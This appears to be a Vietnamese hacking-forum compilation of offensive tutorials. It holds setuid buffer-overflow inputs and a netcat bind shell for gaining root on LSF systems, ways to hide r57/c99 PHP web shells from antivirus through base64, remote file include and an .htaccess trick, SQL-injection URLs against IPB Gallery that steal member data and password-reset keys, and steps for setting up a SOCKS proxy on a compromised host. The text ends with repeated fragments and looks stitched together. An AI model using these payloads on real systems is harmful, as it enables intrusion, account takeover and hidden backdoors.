Bây giờ bạn cần tiếp tục bắt buộc những ứng dụng LSF tới bqc.log.hostname = = > Tất nhiên là nó cần có suid=root. Như vậy bqc.log là ứng cử viên mà chúng ta cần. Tất cả những gì chúng ta cần là hỏi "bqc" về thông tin của hàng đợi không tồn tại. you@localhost# : bqc -i dupa_zbita "bqc" sẽ tìm ra ngoài mà không có hàng đợi như "dupa_zbita". Sau đó nó sẽ được lưu giữ vào log. nó sẽ sử dụng file config của chính mình /my/home/dir/lsf.conf Vulnerability #3: Những sự bất thường bên trong "lsadmin" và "badmin". Hacker có thể khai thác sự bất thường này để Get Root. "lsadmin" và "badmin" được thực thi khi có UID = Root. Hơn nữa các Hacker còn có thể khai thác một số Bug "Buffer Overflow" Chúng được xuất hiện khi "lsadmin" hoặc "badmin" đang cố gắng xác định thư mục môi trường của nó bới biến LSF_ENVDIR kiểm tra. you@localhost# : setenv LSF_ENVDIR `perl -e 'print "A" x 292'` you@localhost# : lsadmin [or badmin] Segmentation fault Nó đã bị Buffer Overflow Vulnerability #4: Bug này khá nguy hiểm Hacker có thể làm tràn bộ đệm hay Get Root. Trong trường hợp không sẵn sàng sử dụng 'eauth' như một cơ chế chứng thực. Tất cả sự thực thi LSF được cài đặt với SUID = Root. Vấn đề này sẽ có thể dẫn đến lỗi tràn bộ đệm: you@localhost# : bstatus `perl -e 'print "A" x 524'` Bạn có thể đặt giá trị trên 524 nếu cần 4) Get Root Để Get Root bạn phải lợi dụng sự sơ hở về Permission của hệ thống. Thường thì /tmp được cấp phép khá lỏng lẻo. Đầu tiên bạn phải tạo một Shell đơn giản vào thư mục /tmp : you@localhost# : cat /tmp/rootshell #!/bin/bash /bin/bash –I Bây giờ ta lấy Netcat ra xài nào. Đặt Netcat ra Listen trên Port nào đó vào Shell mà ta mới tạo: victim@localhost# : nc –vv –l –p 9999 –e /tmp/rootshell listening on [any] 9999 Bây giờ bạn tiếp tục Connect đến Port 9999 mà bạn đặt Listen ở trên: you@localhost#: nc –nvv hacked.machine.com 9999 hacked.machine.com [172.18.9.1] 9999 (?) open stty: standard input: Invalid argument root@localhost#: pwd pwd /rootHy vọng qua bài viết này bạn đã phần nào hiểu được một số cách tấn công Unix…Unix không phải là một OS bất khả xâm phạm…phải không ? ========= copy from HcE Gr0up ============== cách bypass Anti của system (backdoor) mấy con shell như là r57, c99, giờ thì mấy cái server nó cài anti chém sạch ! tui có 1 vài cách bypass anti đơn giản như là: 1, encode qua base64 (không nên chơi zend) cái này thì tất cả đều đọc được, cái này có thể base64 encoder: nhập nguyên code php vòa http://www.vnvista.com/mahoa/another/ thx tacaza 2, chơi kiểu "remote file include" chỉ cần 1 file php đơn giản nhất: Code: <?php include("link_toi_con_shell.txt"); ?> 3. nếu server nó hông cho chơi RFI thì sao ? mình có thể áp dụng cách 1 hoặc là dùng htaccess ! hehe ! đầu tiên kiếm 1 folder nào ta có thể write được, rồi tạo 1 file mới với tên .htaccess, nội dung là: Code: AddType application/x-httpd-php .txt bây giờ bỏ 1 con shell với dạng txt vào trong folder đó, rồi chạy bình thường coi ! tested ! have fun black_hat_cr(HCE) cách chơi IPB gallery > IPB gallery 2.07 trở xuống tác giả: hellknights bug: sql injection/readfile() trọn exploit: http://milw0rm.com/exploits/2473 HcEgroup ! +++++++++++++++++++++++++++ 1, lấy table: Code: /index.php?automodule=gallery&cmd=rate&img=1&rating=1&album=- 1%20union%20select%201,column,1,1,1,1,1,1,1,1%20FROM%20ibf_members%2 0WHERE%20id=<id> chú ý 2 phần đỏ, column=column mình muốn lấy (ex: mgroup) id của victim (ex: 1) 2, lấy validating key để reset pass: đầu tiên: vào đây: /index.php?act=Reg&CODE=10 điền user của victim vào, và confirm code ! sau đó: Code: /index.php?automodule=gallery&cmd=rate&img=1&rating=1&album=- 1%20union%20select%201,vid,1,1,1,1,1,1,1,1%20FROM%20ibf_validating%20 WHERE%20member_id=<id> <id> > id của victim (ex: 1) sau đó reset pass tại: /index.php?act=Reg&CODE=lostpassform chú ý: prefix của victim không phải lúc nào cũng là ibf_ nhưng mà khi inject code vào, nếu nó sai prefix thì nó sẽ hiện ra error, và nó sẽ hiện ra prefix thật ! 3, Read file () /index.php?act=module&module=gallery&cmd=viewimage& img=&file_type=&dir=$file ex: / / / / /etc/passwd chúc vui black_hat_cr(HCE) CGI-Telnet Create Sock Writer:ThangveojpVHS-HCEV-LTHH tk(triki) Trong bài này thangveo sẽ giúp các bạn từ làm cho mình 1 con sock để sử dụng cho riêng bản thân mình. Đầu tiên muốn làm đựoc bạn cần một host hỗ trợ Perl để chạy cgi-telnet.pl Ok khi đã có file cgi-telnet trên host rồi thì down cái này về và up thư mục src ngang với cgi-telnet.pl http://kamiyahomero.net/src.rar Dùng lệnh đầu tiên: cd sock Host thangveo sẽ ra thế này ,mỗi host sẽ khác nhau nhưng ko sao. admin@duoxau.madpage.com /home/www/duoxau.madpage.com]$ Lệnh tiếp theo chạy là wget http://optusnet.dl.sourceforge.net/s s-0.0.2.tar.gz -O mocks.tar.gz Sẽ hiện ra 1 table gần giống cái này -11:01:10 http://optusnet.dl.sourceforge.net/s s-0.0.2.tar.gz => `mocks.tar.gz' Resolving optusnet.dl.sourceforge.net 211.29.132.142 Connecting to optusnet.dl.sourceforge.net[211.29.132.142]:80 connected. HTTP request sent, awaiting response 200 OK Length: 43,840 [application/x-gzip] 0K 100% 42.78 KB/s 11:01:11 (42.78 KB/s) - `mocks.tar.gz' saved [43840/43840 Bước 3 chạy lệnh sau s | grep mocks Nó sẽ ra như sau f===mocks.conf mocks.tar.gz [admin@duoxau.madpage.com /home/www/duoxau.madpage.com] Okie đến đây là ok rồi,tiếp nhé ,chạy tiếp lệnh này tar xzvf mocks.tar.gz Sẽ ra một loạt như sau mocks-0.0.2/ mocks-0.0.2/src/ mocks-0.0.2/src/child.c mocks-0.0.2/src/child.h mocks-0.0.2/src/error.c mocks-0.0.2/src/error.h mocks-0.0.2/src/misc.c mocks-0.0.2/src/misc.h mocks-0.0.2/src/socksd.c mocks-0.0.2/src/socksd.h mocks-0.0.2/src/up_proxy.c mocks-0.0.2/src/up_proxy.h mocks-0.0.2/COPYING mocks-0.0.2/mocks mocks-0.0.2/mocks.conf mocks-0.0.2/README mocks-0.0.2/TODO mocks-0.0.2/build mocks-0.0.2/CHANGELOG Tiếp đánh lệnh và run cd mocks-0.0.2 Nó sẽ ra thế này CHANGELOG COPYING README TODO build . và "badmin". Hacker có thể khai thác sự bất thường này để Get Root. "lsadmin" và "badmin" được thực thi khi có UID = Root. Hơn nữa các Hacker còn có thể khai thác. badmin] Segmentation fault Nó đã bị Buffer Overflow Vulnerability #4: Bug này khá nguy hiểm Hacker có thể làm tràn bộ đệm hay Get Root. Trong trường hợp không sẵn sàng sử dụng 'eauth'